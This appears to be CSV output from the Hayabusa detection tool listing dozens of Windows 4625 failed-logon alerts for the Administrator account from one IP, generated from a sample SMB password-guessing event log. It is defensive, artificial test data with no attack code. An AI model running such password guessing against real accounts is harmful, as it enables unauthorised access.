2016-09-20 01:50:34.108 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: yHjgGhEtZgNwjaii  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:34.148 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: y5gi2SS2mQiDylQ8  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:34.186 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: kqWJGguiWBEplJiZ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:34.228 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: RWP4luPa3lFolQVI  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:34.276 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 5K9DQWbzslRZZMSC  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:34.329 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 5qm0L113v24jlfjx  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:34.360 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: seuUjyGmNlyYT4tU  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:34.400 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: FljAF4LWLmWNa3kL  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:34.447 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: RnN5mBOaAvYu25G7  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:34.476 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: llBt31S46QVzg0Ki  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:34.524 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: b1rvJUZo91Kka0G1  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:34.573 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 7Zqi86ZSFGRnoFM4  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:34.680 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: GeyeVdCUmHEKxR8f  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:34.708 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: DwxJVXt79KBZalqS  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:34.748 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: TDfRu1OTlHmyc38P  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:34.790 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: OLCAMPDWti9hjHtV  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:34.833 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: k2eViuJeorX2peGP  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:34.868 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: davOE9p1fF2LbDP7  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:34.922 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: YFQsEbZnm94eSuUl  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:34.965 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: UnNcBIPoWdJH0x7M  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:34.997 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 8Fw1xVFyar0Cal2J  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:35.040 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: FWzn4Oa8PQdH9Gqs  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:35.081 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: b68beIB5BKyMv8d3  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:35.124 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: HeXSJhEXzpiRX8BT  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:35.169 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: BQ8Zu7ByLWddD4Tk  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:35.196 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: paQzUptV8scmJvsG  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:35.234 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: WQLsoIX9LPvbockz  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:35.272 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: xRYbdVMbUlqFK8oM  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:35.316 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: OSO730O1fxDL4DfQ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:35.352 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 5wmniv339HLGKB4u  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:35.397 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: rO3mxvgSES0lVN34  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:35.433 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: fvK9k9tnCq5hwBqe  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:35.465 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ujFfMT6I6L8OHag9  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:35.517 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: FWKY2Wh21sePUR1L  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:35.562 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 6E6yf8D5cPOEwR0y  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:35.605 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: OpFho8k52BkBlg4Y  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:35.645 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ucDvfSfDYZzjNWFS  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:35.688 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: vnq3S0gEE98xfYLv  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:35.724 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: seVfaEdAS6lEXgkG  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:35.764 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Gz8BQAlyYXB61tx3  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:35.805 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: nkHLs6yikRWVjj9F  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:35.840 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 0bQUcnUBCmE81G6I  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:35.873 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: BceDCcXoHJQv9pDi  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:35.916 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: GCCLt49g8wmAMEyV  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:35.947 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: pM6C8KRcxVIUsZrZ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:35.984 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Fw5DU6l3QRVl9cWY  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:36.016 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 37UthbuO3m4Lr7dU  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:36.056 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: URB7Ji5pQleLtvy4  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:36.101 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: orP9OgiBrYIKZPXE  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:36.132 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ZwvdnlIWhqoDg8On  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:36.181 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: v6dXVbmLBpXc39ah  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:36.229 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 8Mu7amiHAg0l7bza  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:36.276 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: JdG6F697kAXFDx9m  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:36.321 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: jY5AAnfQMH3VZQUa  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:36.357 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: iVep4j7jZZAOAQAj  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:36.393 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: KWWtGIQx8jBgAeoH  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:36.427 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: zn8X8gen8gX9i3QK  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:36.476 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: B9OdUM99RBHzwgVs  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:36.518 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: TJbBVm6wDrqyQmpZ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:36.564 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: tAVRBfMxIyrfsEtR  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:36.600 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: wuCIClZihRxRyjGF  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:36.796 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: yxhpEP6nnmihvkHB  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:36.833 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: J1HYmJDrWmKjj8DF  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:36.872 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: V81dIfR2SRNDk3a2  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:36.908 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: vaZpLaxB1kcCXqHP  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:36.949 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: JRhs8IoV6R6vyCdL  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:36.988 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 4wUYds3Ym3G2abrV  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:37.016 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: tmBfxm6pPLlSEsUI  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:37.056 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: VbAuqFggx0zz5iEn  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:37.104 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 8cytpVOjb4KrNaGg  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:37.149 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: BFFFt7eFzmlzbHhG  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:37.184 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: AJQBZZiNKVGXzx4A  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:37.224 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 7gyu6EyrtbyowTfC  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
